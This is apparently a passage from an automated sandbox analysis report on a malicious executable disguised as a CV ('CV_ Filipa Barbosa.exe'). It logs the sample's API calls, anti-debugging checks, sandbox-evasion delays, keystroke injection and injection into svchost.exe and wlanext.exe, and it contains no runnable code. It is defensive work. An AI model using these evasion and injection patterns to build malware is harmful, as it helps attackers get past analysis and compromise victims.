Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403250 push eax; ret	1_2_00403252
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417409 push ebp; retf	1_2_0041740A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00404CD3 push esp; retf	1_2_00404CD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx	1_2_03C309B6

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00358111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00358111
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0030EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0030EB42

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0031123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0031123A

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	API/Special instruction interceptor: Address: 1376964
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03C7096E rdtsc

1_2_03C7096E

Source: C:\Windows\SysWOW64\wlanext.exe

Window / User API: threadDelayed 9838

Jump to behavior

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Evaded block: after key decision			graph_0-93839
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Evaded block: after key decision			graph_0-92869

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-93329

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Windows\SysWOW64\wlanext.exe TID: 2208	Thread sleep count: 135 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 2208	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 2208	Thread sleep count: 9838 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 2208	Thread sleep time: -19676000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe TID: 2640	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00336CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00336CA9
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_003360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_003360DD
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_003363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_003363F9
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0033EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0033EB60
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0033F56F FindFirstFileW,FindClose,	0_2_0033F56F
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0033F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0033F5FA
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00341B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00341B2F
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00341C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00341C8A
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00341F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00341F94

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0030DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0030DDC0

Source: KzlgpZBFalChd.exe, 00000007.00000002.2998362286.00000000015DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: wlanext.exe, 00000006.00000002.2997660019.000000000050E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2456546920.0000026CE51EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03C7096E rdtsc

1_2_03C7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417763 LdrLoadDll,

1_2_00417763

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_00346AAF BlockInput,

0_2_00346AAF

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_002F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_002F3D19

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_00323920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00323920

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0030E01E LoadLibraryA,GetProcAddress,

0_2_0030E01E

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_013755B0 mov eax, dword ptr fs:[00000030h]	0_2_013755B0
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_01376BD0 mov eax, dword ptr fs:[00000030h]	0_2_01376BD0
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_01376C30 mov eax, dword ptr fs:[00000030h]	0_2_01376C30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h]	1_2_03CEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]	1_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]	1_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]	1_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]	1_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h]	1_2_03CB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	1_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	1_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]	1_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	1_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]	1_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]	1_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]	1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]	1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]	1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]	1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]	1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]	1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]	1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]	1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h]	1_2_03C663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]	1_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]	1_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]	1_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]	1_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]	1_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]	1_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]	1_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]	1_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]	1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]	1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]	1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]	1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h]	1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]	1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]	1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h]	1_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h]	1_2_03CD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h]	1_2_03CD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]	1_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]	1_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]	1_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h]	1_2_03C2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h]	1_2_03C50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]	1_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]	1_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]	1_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]	1_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]	1_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]	1_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]	1_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]	1_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]	1_2_03C402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]	1_2_03C402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]	1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h]	1_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h]	1_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h]	1_2_03C2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h]	1_2_03C36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]	1_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]	1_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]	1_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]	1_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]	1_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h]	1_2_03C2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h]	1_2_03C2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h]	1_2_03D061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h]	1_2_03C601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h]	1_2_03C70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]	1_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]	1_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]	1_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]	1_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]	1_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]	1_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]	1_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]	1_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]	1_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]	1_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]	1_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]	1_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]	1_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]	1_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]	1_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]	1_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]	1_2_03C2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]	1_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]	1_2_03C36154
